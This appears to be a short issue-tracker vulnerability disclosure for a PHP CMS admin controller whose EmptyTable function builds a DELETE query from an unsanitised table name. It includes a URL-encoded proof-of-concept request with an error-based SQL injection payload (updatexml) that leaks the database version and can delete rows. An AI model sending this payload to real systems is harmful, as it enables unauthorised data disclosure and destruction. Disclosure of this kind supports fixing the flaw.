Open
Description
Vulnerability file: admin\controllers\database.php
private function EmptyTable($tablename) { $this->db->exe("DELETE FROM `$tablename`"); $msg = '已完成清空数据库表: ' . $tablename . '<br/>'; return $msg; }
The $tablename parameter controllable.
POC (Administrator Privilege):
/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60
Metadata
Metadata
Assignees
Labels
No labels
